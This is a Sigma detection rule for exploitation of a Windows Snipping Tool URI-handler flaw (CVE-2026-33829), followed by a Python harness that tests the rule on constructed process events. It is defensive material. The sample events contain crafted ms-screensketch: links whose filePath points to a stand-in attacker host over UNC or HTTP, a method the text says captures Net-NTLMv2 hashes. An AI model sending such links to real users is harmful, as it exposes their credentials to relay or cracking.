Potential CVE-2026-33829 Exploitation - Windows Snipping Tool Remote File Path URI
Detects potential exploitation of CVE-2026-33829, a vulnerability in the Windows Snipping Tool URI handler (ms-screensketch:). An attacker can abuse the 'filePath' parameter to supply a UNC path or HTTP URL, causing SnippingTool.exe to initiate a connection to a remote resource. When a UNC path is used (e.g. \\attacker.com\share), this triggers an outbound NTLM authentication attempt, allowing the attacker to capture or relay the victim's Net-NTLMv2 hash. HTTP-based paths may result in remote file loading or server-side request forgery (SSRF)-style access. The URI can be delivered via a malicious hyperlink, phishing email, or web page.
Developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
```yaml
detection:
  selection:
    Image|endswith: '\SnippingTool.exe'
    CommandLine|contains:
      # '\\\\' = literal double backslash (UNC path start); '%5C' and '%%5C' are URL-encoded variations of the same backslash character
      - 'ms-screensketch:edit?&filePath=\\\\'
      - 'ms-screensketch:edit?&filePath=%%5C'
      - 'ms-screensketch:edit?&filePath=%5C'
      - 'ms-screensketch:edit?&filePath=http'
  condition: selection
```

False positive likelihood has not been assessed. Additional context may be needed during triage.
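The following is an added example, not part of the rule or of any Sigma backend, that evaluates the detection logic above against constructed process-creation events and adds a small triage helper. It assumes Sysmon-style field names (`Image`, `CommandLine`), the Sigma default of case-insensitive `endswith`/`contains` matching, and that Sigma's `'\\\\'` renders as two literal backslashes. The image path, hostnames and command lines are invented for illustration.

```python
"""Run the Snipping Tool URI rule over constructed events (added example)."""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# Values as a backend renders the YAML: '\\\\' is two literal backslashes,
# and Sigma string modifiers match case-insensitively by default.
IMAGE_SUFFIX = "\\snippingtool.exe"
CMDLINE_MARKERS = (
    "ms-screensketch:edit?&filepath=\\\\",
    "ms-screensketch:edit?&filepath=%%5c",
    "ms-screensketch:edit?&filepath=%5c",
    "ms-screensketch:edit?&filepath=http",
)


def matches_rule(event: dict) -> bool:
    """Image|endswith AND CommandLine|contains (any marker in the list)."""
    image = event.get("Image", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    return image.endswith(IMAGE_SUFFIX) and any(m in cmdline for m in CMDLINE_MARKERS)


_FILEPATH_RE = re.compile(r"filepath=([^&\s\"']+)", re.IGNORECASE)


def extract_target(cmdline: str) -> Optional[dict]:
    """Triage helper: pull the filePath value out of the URI, undo the
    URL-encoded backslash variants the rule looks for, and classify where
    SnippingTool.exe would reach out to (UNC host, HTTP host, or local)."""
    m = _FILEPATH_RE.search(cmdline)
    if not m:
        return None
    # '%%5C' collapses to '%5C' first; ordinary percent-decoding then yields '\'.
    decoded = unquote(m.group(1).replace("%%", "%"))
    if decoded.startswith("\\\\"):
        host = decoded[2:].split("\\", 1)[0]
        return {"kind": "unc", "host": host, "path": decoded}
    if decoded.lower().startswith(("http://", "https://")):
        return {"kind": "http", "host": urlsplit(decoded).hostname, "path": decoded}
    return {"kind": "local", "host": None, "path": decoded}


def run_rule(events: list) -> list:
    """Return (index, triage info) for every event the rule fires on."""
    return [(i, extract_target(e["CommandLine"])) for i, e in enumerate(events)
            if matches_rule(e)]


# Constructed sample events; the image path and hostname are invented.
IMAGE = r"C:\Program Files\WindowsApps\SnippingTool\SnippingTool.exe"


def ev(uri: str, image: str = IMAGE) -> dict:
    return {"Image": image, "CommandLine": '"' + image + '" ' + uri}


SAMPLE_EVENTS = [
    # 0: UNC path with plain backslashes -> outbound SMB/NTLM to the host
    ev(r"ms-screensketch:edit?&filePath=\\files.attacker.example\share\cap.png"),
    # 1: same target, URL-encoded backslashes
    ev("ms-screensketch:edit?&filePath=%5C%5Cfiles.attacker.example%5Cshare%5Ccap.png"),
    # 2: same target, double-percent variant
    ev("ms-screensketch:edit?&filePath=%%5C%%5Cfiles.attacker.example%%5Cshare%%5Ccap.png"),
    # 3: HTTP URL
    ev("ms-screensketch:edit?&filePath=https://files.attacker.example/cap.png"),
    # 4: benign local file; the rule should stay quiet
    ev(r"ms-screensketch:edit?&filePath=C:\Users\alice\Pictures\cap.png"),
    # 5: marker present but a different image; the rule should stay quiet
    ev(r"ms-screensketch:edit?&filePath=\\files.attacker.example\x",
       image=r"C:\Windows\System32\notepad.exe"),
]

if __name__ == "__main__":
    for idx, target in run_rule(SAMPLE_EVENTS):
        print(idx, target["kind"], target["host"], target["path"])
```

The helper decodes the same encodings the rule enumerates, so an analyst sees one normalised host per alert regardless of which variant the phishing link used; events 4 and 5 show the two ways a `ms-screensketch:` launch stays below the rule (local path, or a different image).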